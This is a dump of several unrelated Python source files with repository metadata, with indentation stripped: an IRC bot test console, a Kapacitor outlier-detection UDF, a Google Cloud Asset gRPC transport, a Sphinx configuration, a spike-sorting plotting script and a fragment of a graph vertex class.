from test.fake_tbot import TestedBot
TBOT = TestedBot()
for module in TO_LOAD:
try:
MODULES[module] = __import__(module)
for function in dir(MODULES[module]):
glob = MODULES[module].__dict__[function]
if hasattr(glob, 'rule'):
TBOT.register(glob, function)
except:
pass
USER = "[USER]"
CHANNEL = "[CHANNEL]"
print __doc__
while True:
try:
msg = raw_input("> ")
except EOFError:
print ""
print "Bye!"
sys.exit()
except KeyboardInterrupt:
print ""
print "Bye!"
sys.exit()
if msg and msg[0] == "/":
try:
(command, value) = msg.split(" ", 1)
except:
command = msg
if command == "/nick":
USER = value
print "(Nick has changed to '%s')" % USER
elif command == "/j":
CHANNEL = value
print "(Channel has changed to '%s')" % CHANNEL
elif command == "/rules":
print "\n".join(TBOT.rules())
else:
print "(Not a recognised command)"
else:
try:
TBOT.listen(USER, CHANNEL, msg)
if [] != TBOT.bot_messages:
print regex.sub('', "\n".join([x[1] for x in TBOT.bot_messages]))
TBOT.bot_messages = []
except:
print traceback.format_exc()
|
andimiller/twistedbot
|
trtl.py
|
Python
|
mit
| 1,914
|
import sys
import json
from agent import Agent, Handler
import udf_pb2
import logging
logging.basicConfig(level=logging.DEBUG, format='%(asctime)s %(levelname)s:%(name)s: %(message)s')
logger = logging.getLogger()
# Find outliers via the Tukey method. As defined in the README.md
class OutliersHandler(Handler):
class state(object):
def __init__(self):
self._entries = []
def reset(self):
self._entries = []
def update(self, value, point):
self._entries.append((value, point))
def outliers(self, scale):
first, third, lower, upper = self.bounds(scale)
outliers = []
# Append lower outliers
for i in range(first):
if self._entries[i][0] < lower:
outliers.append(self._entries[i][1])
else:
break
# Append upper outliers
for i in range(third+1, len(self._entries)):
if self._entries[i][0] > upper:
outliers.append((self._entries[i][1]))
return outliers
def bounds(self, scale):
self._entries = sorted(self._entries, key=lambda x: x[0])
ml, mr, _ = self.median(self._entries)
_, first, fq = self.median(self._entries[:mr])
third, _, tq = self.median(self._entries[ml+1:])
iqr = tq - fq
lower = fq - iqr*scale
upper = tq + iqr*scale
return first, third, lower, upper
def median(self, data):
l = len(data)
m = l / 2
if l%2 == 0:
left = m
right = m + 1
median = (data[left][0]+ data[right][0]) / 2.0
else:
left = m
right = m
median = data[m][0]
return left, right, median
def __init__(self, agent):
self._agent = agent
self._field = None
self._scale = 1.5
self._state = OutliersHandler.state()
def info(self):
response = udf_pb2.Response()
response.info.wants = udf_pb2.BATCH
response.info.provides = udf_pb2.BATCH
response.info.options['field'].valueTypes.append(udf_pb2.STRING)
response.info.options['scale'].valueTypes.append(udf_pb2.DOUBLE)
logger.info("info")
return response
def init(self, init_req):
success = True
msg = ''
for opt in init_req.options:
if opt.name == 'field':
self._field = opt.values[0].stringValue
elif opt.name == 'scale':
self._scale = opt.values[0].doubleValue
elif opt.name == 'as':
self._as = opt.values[0].stringValue
if self._field is None:
success = False
msg += ' must supply field name'
if self._scale < 1.0:
success = False
msg += ' invalid scale must be >= 1.0'
response = udf_pb2.Response()
response.init.success = success
response.init.error = msg[1:]
return response
def snapshot(self):
response = udf_pb2.Response()
response.snapshot.snapshot = ''
return response
def restore(self, restore_req):
response = udf_pb2.Response()
response.restore.success = False
response.restore.error = 'not implemented'
return response
def begin_batch(self, begin_req):
self._state.reset()
# Send an identical begin batch back to Kapacitor
response = udf_pb2.Response()
response.begin.CopyFrom(begin_req)
self._agent.write_response(response)
def point(self, point):
value = point.fieldsDouble[self._field]
self._state.update(value, point)
def end_batch(self, end_req):
outliers = self._state.outliers(self._scale)
response = udf_pb2.Response()
for outlier in outliers:
response.point.CopyFrom(outlier)
self._agent.write_response(response)
# Send an identical end batch back to Kapacitor
response.end.CopyFrom(end_req)
self._agent.write_response(response)
if __name__ == '__main__':
a = Agent()
h = OutliersHandler(a)
a.handler = h
logger.info("Starting Agent")
a.start()
a.wait()
logger.info("Agent finished")
|
alerta/kapacitor
|
udf/agent/examples/outliers/outliers.py
|
Python
|
mit
| 4,428
|
# -*- coding: utf-8 -*-
# Copyright 2022 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import warnings
from typing import Callable, Dict, Optional, Sequence, Tuple, Union
from google.api_core import grpc_helpers
from google.api_core import gapic_v1
import google.auth # type: ignore
from google.auth import credentials as ga_credentials # type: ignore
from google.auth.transport.grpc import SslCredentials # type: ignore
import grpc # type: ignore
from google.cloud.asset_v1p2beta1.types import asset_service
from google.protobuf import empty_pb2 # type: ignore
from .base import AssetServiceTransport, DEFAULT_CLIENT_INFO
class AssetServiceGrpcTransport(AssetServiceTransport):
"""gRPC backend transport for AssetService.
Asset service definition.
This class defines the same methods as the primary client, so the
primary client can load the underlying transport implementation
and call it.
It sends protocol buffers over the wire using gRPC (which is built on
top of HTTP/2); the ``grpcio`` package must be installed.
"""
_stubs: Dict[str, Callable]
def __init__(
self,
*,
host: str = "cloudasset.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Sequence[str] = None,
channel: grpc.Channel = None,
api_mtls_endpoint: str = None,
client_cert_source: Callable[[], Tuple[bytes, bytes]] = None,
ssl_channel_credentials: grpc.ChannelCredentials = None,
client_cert_source_for_mtls: Callable[[], Tuple[bytes, bytes]] = None,
quota_project_id: Optional[str] = None,
client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO,
always_use_jwt_access: Optional[bool] = False,
) -> None:
"""Instantiate the transport.
Args:
host (Optional[str]):
The hostname to connect to.
credentials (Optional[google.auth.credentials.Credentials]): The
authorization credentials to attach to requests. These
credentials identify the application to the service; if none
are specified, the client will attempt to ascertain the
credentials from the environment.
This argument is ignored if ``channel`` is provided.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is ignored if ``channel`` is provided.
scopes (Optional(Sequence[str])): A list of scopes. This argument is
ignored if ``channel`` is provided.
channel (Optional[grpc.Channel]): A ``Channel`` instance through
which to make calls.
api_mtls_endpoint (Optional[str]): Deprecated. The mutual TLS endpoint.
If provided, it overrides the ``host`` argument and tries to create
a mutual TLS channel with client SSL credentials from
``client_cert_source`` or application default SSL credentials.
client_cert_source (Optional[Callable[[], Tuple[bytes, bytes]]]):
Deprecated. A callback to provide client SSL certificate bytes and
private key bytes, both in PEM format. It is ignored if
``api_mtls_endpoint`` is None.
ssl_channel_credentials (grpc.ChannelCredentials): SSL credentials
for the grpc channel. It is ignored if ``channel`` is provided.
client_cert_source_for_mtls (Optional[Callable[[], Tuple[bytes, bytes]]]):
A callback to provide client certificate bytes and private key bytes,
both in PEM format. It is used to configure a mutual TLS channel. It is
ignored if ``channel`` or ``ssl_channel_credentials`` is provided.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
client_info (google.api_core.gapic_v1.client_info.ClientInfo):
The client info used to send a user-agent string along with
API requests. If ``None``, then default info will be used.
Generally, you only need to set this if you're developing
your own client library.
always_use_jwt_access (Optional[bool]): Whether self signed JWT should
be used for service account credentials.
Raises:
google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport
creation failed for any reason.
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
self._grpc_channel = None
self._ssl_channel_credentials = ssl_channel_credentials
self._stubs: Dict[str, Callable] = {}
if api_mtls_endpoint:
warnings.warn("api_mtls_endpoint is deprecated", DeprecationWarning)
if client_cert_source:
warnings.warn("client_cert_source is deprecated", DeprecationWarning)
if channel:
# Ignore credentials if a channel was passed.
credentials = False
# If a channel was explicitly provided, set it.
self._grpc_channel = channel
self._ssl_channel_credentials = None
else:
if api_mtls_endpoint:
host = api_mtls_endpoint
# Create SSL credentials with client_cert_source or application
# default SSL credentials.
if client_cert_source:
cert, key = client_cert_source()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
else:
self._ssl_channel_credentials = SslCredentials().ssl_credentials
else:
if client_cert_source_for_mtls and not ssl_channel_credentials:
cert, key = client_cert_source_for_mtls()
self._ssl_channel_credentials = grpc.ssl_channel_credentials(
certificate_chain=cert, private_key=key
)
# The base transport sets the host, credentials and scopes
super().__init__(
host=host,
credentials=credentials,
credentials_file=credentials_file,
scopes=scopes,
quota_project_id=quota_project_id,
client_info=client_info,
always_use_jwt_access=always_use_jwt_access,
)
if not self._grpc_channel:
self._grpc_channel = type(self).create_channel(
self._host,
# use the credentials which are saved
credentials=self._credentials,
# Set ``credentials_file`` to ``None`` here as
# the credentials that we saved earlier should be used.
credentials_file=None,
scopes=self._scopes,
ssl_credentials=self._ssl_channel_credentials,
quota_project_id=quota_project_id,
options=[
("grpc.max_send_message_length", -1),
("grpc.max_receive_message_length", -1),
],
)
# Wrap messages. This must be done after self._grpc_channel exists
self._prep_wrapped_messages(client_info)
@classmethod
def create_channel(
cls,
host: str = "cloudasset.googleapis.com",
credentials: ga_credentials.Credentials = None,
credentials_file: str = None,
scopes: Optional[Sequence[str]] = None,
quota_project_id: Optional[str] = None,
**kwargs,
) -> grpc.Channel:
"""Create and return a gRPC channel object.
Args:
host (Optional[str]): The host for the channel to use.
credentials (Optional[~.Credentials]): The
authorization credentials to attach to requests. These
credentials identify this application to the service. If
none are specified, the client will attempt to ascertain
the credentials from the environment.
credentials_file (Optional[str]): A file with credentials that can
be loaded with :func:`google.auth.load_credentials_from_file`.
This argument is mutually exclusive with credentials.
scopes (Optional[Sequence[str]]): A optional list of scopes needed for this
service. These are only used when credentials are not specified and
are passed to :func:`google.auth.default`.
quota_project_id (Optional[str]): An optional project to use for billing
and quota.
kwargs (Optional[dict]): Keyword arguments, which are passed to the
channel creation.
Returns:
grpc.Channel: A gRPC channel object.
Raises:
google.api_core.exceptions.DuplicateCredentialArgs: If both ``credentials``
and ``credentials_file`` are passed.
"""
return grpc_helpers.create_channel(
host,
credentials=credentials,
credentials_file=credentials_file,
quota_project_id=quota_project_id,
default_scopes=cls.AUTH_SCOPES,
scopes=scopes,
default_host=cls.DEFAULT_HOST,
**kwargs,
)
@property
def grpc_channel(self) -> grpc.Channel:
"""Return the channel designed to connect to this service.
"""
return self._grpc_channel
@property
def create_feed(
self,
) -> Callable[[asset_service.CreateFeedRequest], asset_service.Feed]:
r"""Return a callable for the create feed method over gRPC.
Creates a feed in a parent
project/folder/organization to listen to its asset
updates.
Returns:
Callable[[~.CreateFeedRequest],
~.Feed]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "create_feed" not in self._stubs:
self._stubs["create_feed"] = self.grpc_channel.unary_unary(
"/google.cloud.asset.v1p2beta1.AssetService/CreateFeed",
request_serializer=asset_service.CreateFeedRequest.serialize,
response_deserializer=asset_service.Feed.deserialize,
)
return self._stubs["create_feed"]
@property
def get_feed(self) -> Callable[[asset_service.GetFeedRequest], asset_service.Feed]:
r"""Return a callable for the get feed method over gRPC.
Gets details about an asset feed.
Returns:
Callable[[~.GetFeedRequest],
~.Feed]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "get_feed" not in self._stubs:
self._stubs["get_feed"] = self.grpc_channel.unary_unary(
"/google.cloud.asset.v1p2beta1.AssetService/GetFeed",
request_serializer=asset_service.GetFeedRequest.serialize,
response_deserializer=asset_service.Feed.deserialize,
)
return self._stubs["get_feed"]
@property
def list_feeds(
self,
) -> Callable[[asset_service.ListFeedsRequest], asset_service.ListFeedsResponse]:
r"""Return a callable for the list feeds method over gRPC.
Lists all asset feeds in a parent
project/folder/organization.
Returns:
Callable[[~.ListFeedsRequest],
~.ListFeedsResponse]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "list_feeds" not in self._stubs:
self._stubs["list_feeds"] = self.grpc_channel.unary_unary(
"/google.cloud.asset.v1p2beta1.AssetService/ListFeeds",
request_serializer=asset_service.ListFeedsRequest.serialize,
response_deserializer=asset_service.ListFeedsResponse.deserialize,
)
return self._stubs["list_feeds"]
@property
def update_feed(
self,
) -> Callable[[asset_service.UpdateFeedRequest], asset_service.Feed]:
r"""Return a callable for the update feed method over gRPC.
Updates an asset feed configuration.
Returns:
Callable[[~.UpdateFeedRequest],
~.Feed]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "update_feed" not in self._stubs:
self._stubs["update_feed"] = self.grpc_channel.unary_unary(
"/google.cloud.asset.v1p2beta1.AssetService/UpdateFeed",
request_serializer=asset_service.UpdateFeedRequest.serialize,
response_deserializer=asset_service.Feed.deserialize,
)
return self._stubs["update_feed"]
@property
def delete_feed(
self,
) -> Callable[[asset_service.DeleteFeedRequest], empty_pb2.Empty]:
r"""Return a callable for the delete feed method over gRPC.
Deletes an asset feed.
Returns:
Callable[[~.DeleteFeedRequest],
~.Empty]:
A function that, when called, will call the underlying RPC
on the server.
"""
# Generate a "stub function" on-the-fly which will actually make
# the request.
# gRPC handles serialization and deserialization, so we just need
# to pass in the functions for each.
if "delete_feed" not in self._stubs:
self._stubs["delete_feed"] = self.grpc_channel.unary_unary(
"/google.cloud.asset.v1p2beta1.AssetService/DeleteFeed",
request_serializer=asset_service.DeleteFeedRequest.serialize,
response_deserializer=empty_pb2.Empty.FromString,
)
return self._stubs["delete_feed"]
def close(self):
self.grpc_channel.close()
__all__ = ("AssetServiceGrpcTransport",)
|
googleapis/python-asset
|
google/cloud/asset_v1p2beta1/services/asset_service/transports/grpc.py
|
Python
|
apache-2.0
| 15,773
|
# -*- coding: utf-8 -*-
#
# Diazo documentation build configuration file, created by
# sphinx-quickstart on Tue Nov 2 18:58:07 2010.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Diazo'
copyright = u'2011, Plone Foundation'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '1.0b1'
# The full version, including alpha/beta/rc tags.
release = '1.0b1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'haiku'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
html_title = "Diazo"
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = images/logo.jpg
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Diazodoc'
# -- Options for LaTeX output --------------------------------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'Diazo.tex', u'Diazo Documentation',
u'Plone Foundation', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'diazo', u'Diazo Documentation',
[u'Plone Foundation'], 1)
]
|
ebrehault/diazo
|
docs/conf.py
|
Python
|
bsd-3-clause
| 6,987
|
from yass.reader import READER
import numpy as np
import os
import parmap
from scipy.interpolate import interp1d
import matplotlib.pyplot as plt
def get_cov(templates):
dat = templates.transpose(0, 2, 1).reshape(-1, templates.shape[1])
dat = dat[:, 30:-30]
dat = dat[dat.ptp(1) > 0.5]
dat = dat - np.mean(dat, 1, keepdims=True)
dat = dat/np.std(dat, 1, keepdims=True)
acov = np.ones(3)
for ii in range(1,3):
acov[ii] = np.mean(dat[:,ii:]*dat[:,:-ii])
cov = np.eye(3)
cov[0,1] = acov[1]
cov[1,0] = acov[1]
cov[1,2] = acov[1]
cov[2,1] = acov[1]
cov[0,2] = acov[2]
cov[2,0] = acov[2]
w, v = np.linalg.eig(cov)
w[w<=0] = 1e-9
cov_half = np.matmul(np.matmul(v, np.diag(np.sqrt(w))), v.T)
return cov_half
def get_noise_samples(cov_half, n_samples):
return np.matmul(np.random.randn(n_samples, 3), cov_half)
def split_templates(templates_dir, ptp_threshold, n_updates, update_time):
# load initial templates
init_templates = np.load(
os.path.join(templates_dir, 'templates_{}sec.npy').format(0))
n_units, n_times, n_channels = init_templates.shape
vis_chans = [None]*n_units
templates_sparse = [None]*n_units
for k in range(n_units):
ptp_ = init_templates[k].ptp(0)
vis_chan_ = np.where(ptp_ > ptp_threshold)[0]
vis_chans[k] = vis_chan_[np.argsort(ptp_[vis_chan_])[::-1]]
templates_sparse[k] = np.zeros((n_updates, n_times, len(vis_chans[k])), 'float32')
for j in range(n_updates):
templates = np.load(os.path.join(templates_dir, 'templates_{}sec.npy').format(
update_time*j)).astype('float32')
for k in range(n_units):
templates_sparse[k][j] = templates[k, :, vis_chans[k]].T
return templates_sparse, vis_chans
def get_data(k, vis_chans_all, templates_sparse, init_templates,
spike_train, scales, shifts, reader_resid,
n_updates, update_time, meta_data_dir, cov_half):
vis_chan = vis_chans_all[k]
templates_unit = templates_sparse[k]
ptps_unit = templates_unit.ptp(1).astype('float32')
n_units, n_times, n_channels = init_templates.shape
# spike times, shifts and scales
idx_ = np.where(spike_train[:, 1]==k)[0]
if len(idx_) > 20000:
idx_ = np.random.choice(idx_, 20000, False)
spt_ = spike_train[idx_, 0]
scale_ = scales[idx_]
shift_ = shifts[idx_]
# get residual
residual, idx_skipped = reader_resid.read_waveforms(spt_, n_times=n_times, channels=vis_chan)
spt_ = np.delete(spt_, idx_skipped)
scale_ = np.delete(scale_, idx_skipped)
shift_ = np.delete(shift_, idx_skipped)
spt_sec = spt_/reader_resid.sampling_rate
# get residual variance and residual ptp
residual_variance = np.zeros((n_updates, len(vis_chan)), 'float32')
ptps_clean = np.zeros((len(residual), len(vis_chan)), 'float32')
ptps_unit = np.zeros((n_updates, len(vis_chan)), 'float32')
for j in range(n_updates):
t_start = update_time*j
t_end = update_time*(j+1)
idx_ = np.where(np.logical_and(spt_sec >= t_start, spt_sec < t_end))[0]
residual_variance[j] = np.var(residual[idx_], axis=0).mean(0)
min_loc = templates_unit[j].argmin(0)
max_loc = templates_unit[j].argmax(0)
min_loc[min_loc < 1] = 1
max_loc[max_loc < 1] = 1
min_loc[min_loc > 99] = 99
max_loc[max_loc > 99] = 99
#min_max_loc = np.stack((min_loc, max_loc), 1)
# get residual ptp
t_range = np.arange(-1, 2)
for ii in range(len(vis_chan)):
f = interp1d(np.arange(n_times), templates_unit[j, :, ii],
'cubic', fill_value='extrapolate')
mins_temp = f((min_loc[ii] + t_range)[:, None] - shift_[idx_]).T
maxs_temp = f((max_loc[ii] + t_range)[:, None] - shift_[idx_]).T
mins_temp *= scale_[idx_][:, None]
maxs_temp *= scale_[idx_][:, None]
mins_ = mins_temp + residual[idx_][:, min_loc[ii] + t_range, ii]
maxs_ = maxs_temp + residual[idx_][:, max_loc[ii] + t_range, ii]
ptps_clean[idx_, ii] = (maxs_.max(1) - mins_.min(1))#*scale_[idx_]
noise_sample = get_noise_samples(cov_half, 2*len(idx_))
ptps_unit[j, ii] = np.mean(np.max(maxs_temp + noise_sample[:len(idx_)], 1) -
np.min(mins_temp + noise_sample[len(idx_):], 1), 0)
# save meta data
fname_meta_data = os.path.join(meta_data_dir, 'unit_{}.npz'.format(k))
np.savez(fname_meta_data,
ptps_clean=ptps_clean,
ptps_unit=ptps_unit,
residual_variance=residual_variance,
vis_chan=vis_chan,
update_time=update_time,
spt_sec=spt_sec
)
def get_plot_ptps(save_dir, fname_raw, fname_residual,
fname_spike_train, fname_scales,
fname_shifts, templates_dir,
ptp_threshold, n_col, CONFIG,
units_in=None,
fname_drifts_gt=None,
n_nearby_units=3
):
reader_raw = READER(fname_raw, 'float32', CONFIG)
reader_resid = READER(fname_residual, 'float32', CONFIG)
update_time = CONFIG.deconvolution.template_update_time
# load initial templates
init_templates = np.load(
os.path.join(templates_dir, 'templates_{}sec.npy').format(0))
n_units = init_templates.shape[0]
meta_data_dir = os.path.join(save_dir, 'meta_data')
if not os.path.exists(meta_data_dir):
os.makedirs(meta_data_dir)
figs_dir = os.path.join(save_dir, 'figs')
if not os.path.exists(figs_dir):
os.makedirs(figs_dir)
if units_in is None:
units_in = np.arange(n_units)
units_in = units_in[units_in < n_units]
get_plot_ptps_parallel(
units_in,
reader_raw,
reader_resid,
fname_spike_train,
fname_scales,
fname_shifts,
templates_dir,
meta_data_dir,
figs_dir,
update_time,
ptp_threshold,
n_col,
fname_drifts_gt,
n_nearby_units
)
def get_plot_ptps_parallel(
units_in, reader_raw, reader_resid,
fname_spike_train, fname_scales,
fname_shifts, templates_dir,
meta_data_dir, figs_dir, update_time,
ptp_threshold, n_col, fname_drifts_gt=None, n_nearby_units=3):
# basic info about templates update
n_updates = int(np.ceil(reader_resid.rec_len/reader_raw.sampling_rate/update_time))
# load initial templates
init_templates = np.load(
os.path.join(templates_dir, 'templates_{}sec.npy').format(0))
n_units, n_times, n_channels = init_templates.shape
cov_half = get_cov(init_templates)
# spike train
spike_train = np.load(fname_spike_train)
f_rates = np.zeros(n_units)
a, b = np.unique(spike_train[:, 1], return_counts=True)
f_rates[a] = b
f_rates = f_rates/(reader_raw.rec_len/20000)
# scale and shifts
scales = np.load(fname_scales)
shifts = np.load(fname_shifts)
fname_templates_sprase = os.path.join(meta_data_dir, 'templates_sparse.npy')
fname_vis_chans = os.path.join(meta_data_dir, 'vis_chans.npy')
if not os.path.exists(fname_templates_sprase):
templates_sparse, vis_chans_all = split_templates(
templates_dir, ptp_threshold, n_updates, update_time)
#np.save(fname_templates_sprase, templates_sparse, allow_pickle=True)
#np.save(fname_vis_chansi, vis_chans_all, allow_pickle=True)
else:
templates_sprase = np.load(fname_templates_sprase, allow_pickle=True)
vis_chans_all = np.load(fname_vis_chans, allow_pickle=True)
ptps_all = init_templates.ptp(1)
nearby_units = np.zeros((len(units_in), n_nearby_units), 'int32')
for ii, unit in enumerate(units_in):
nearby_units[ii] = np.argsort(
np.square(ptps_all - ptps_all[unit]).sum(1))[:n_nearby_units]
# order units in
#units_in_ordered = units_in[np.argsort(init_templates[units_in].ptp(1).max(1))[::-1]]
#units_in_ordered = units_in
run_order = np.argsort(init_templates[units_in].ptp(1).max(1))[::-1]
if fname_drifts_gt is not None:
drifts_gt = np.load(fname_drifts_gt)
else:
drifts_gt = None
for idx_ in run_order:
unit = units_in[idx_]
print(unit)
nearby_units_ = nearby_units[idx_]
for k in nearby_units_:
# save meta data
fname_meta_data = os.path.join(meta_data_dir, 'unit_{}.npz'.format(k))
if not os.path.exists(fname_meta_data):
get_data(k, vis_chans_all, templates_sparse, init_templates,
spike_train, scales, shifts, reader_resid,
n_updates, update_time, meta_data_dir, cov_half)
vis_chan = vis_chans_all[unit]
templates_unit = templates_sparse[unit]
ptp_unit_init = init_templates[unit, :, vis_chan].ptp(1)
colors = ['k', 'red', 'blue', 'yellow']
# make figs
n_row = int(np.ceil(len(vis_chan)/n_col))
ptp_max_ = np.round(float(ptp_unit_init.max()), 1)
fname_out = 'ptp_{}_unit{}_clean_ptp.png'.format(int(ptp_max_), unit)
fname_out = os.path.join(figs_dir, fname_out)
if not os.path.exists(fname_out):
fig = plt.figure(figsize=(3*n_col, 3*n_row))
for jj, k in enumerate(nearby_units_):
if jj == 0:
fname_meta_data = os.path.join(meta_data_dir, 'unit_{}.npz'.format(k))
temp = np.load(fname_meta_data, allow_pickle=True)
ptps_clean = temp['ptps_clean']
ptps_unit = temp['ptps_unit']
vis_chan = temp['vis_chan']
update_time = temp['update_time']
spt_sec = temp['spt_sec']
residual_variance = temp['residual_variance']
if len(spt_sec) == 0:
continue
alpha = np.min((0.05*20000/len(spt_sec), 0.5))
for ii in range(len(vis_chan)):
plt.subplot(n_row, n_col, ii+1)
plt.scatter(spt_sec, ptps_clean[:, ii], c='k', s=10, alpha=0.05)
for j in range(n_updates):
t_start = update_time*j
t_end = update_time*(j+1)
ptp_ = ptps_unit[j, ii]
plt.plot([t_start, t_end], [ptp_, ptp_], 'orange', linewidth=5)
if drifts_gt is not None:
c = vis_chan[ii]
ptp_start = init_templates[k, :, c].ptp()
ptp_end = ptp_start*drifts_gt[k, c]
plt.plot([0, reader_raw.rec_len/reader_raw.sampling_rate],
[ptp_start, ptp_end], 'b', linewidth=3)
plt.title('Channel {}'.format(vis_chan[ii]))
else:
fname_meta_data = os.path.join(meta_data_dir, 'unit_{}.npz'.format(k))
temp = np.load(fname_meta_data, allow_pickle=True)
ptps_clean_k = temp['ptps_clean']
vis_chan_k = temp['vis_chan']
spt_sec_k = temp['spt_sec']
if len(spt_sec_k) == 0:
continue
alpha = np.min((0.005*20000/len(spt_sec_k), 0.5))
for ii in range(len(vis_chan)):
if np.any(vis_chan_k == vis_chan[ii]):
ii2 = np.where(vis_chan_k==vis_chan[ii])[0][0]
plt.subplot(n_row, n_col, ii+1)
plt.scatter(spt_sec_k, ptps_clean_k[:, ii2],
c=colors[jj], s=3, alpha=alpha)
f_rate_print = np.round(float(f_rates[unit]), 1)
suptitle = 'Clean PTP, Unit {}, PTP {}, {}Hz'.format(unit, ptp_max_, f_rate_print)
for jj in range(1, n_nearby_units):
ptp_print = np.round(float(ptps_all[nearby_units_[jj]].max()),1)
f_rate_print = np.round(float(f_rates[nearby_units_[jj]]), 1)
suptitle += '\n{}: '.format(colors[jj])
suptitle += ' ID {}, PTP {}, {}Hz '.format(nearby_units_[jj], ptp_print, f_rate_print)
plt.suptitle(suptitle, fontsize=20)
plt.tight_layout(rect=[0, 0.03, 1, 0.92])
plt.savefig(fname_out)
plt.close()
|
paninski-lab/yass
|
src/yass/visual/ptp_time.py
|
Python
|
apache-2.0
| 12,874
|
class Vertex(object):
def __init__(self, data, in_degree=0, out_degree=0, status='UNDISCOVERED', \
d_time=-1, f_time=-1, parent=-1, prioity=65532):
self.data = data
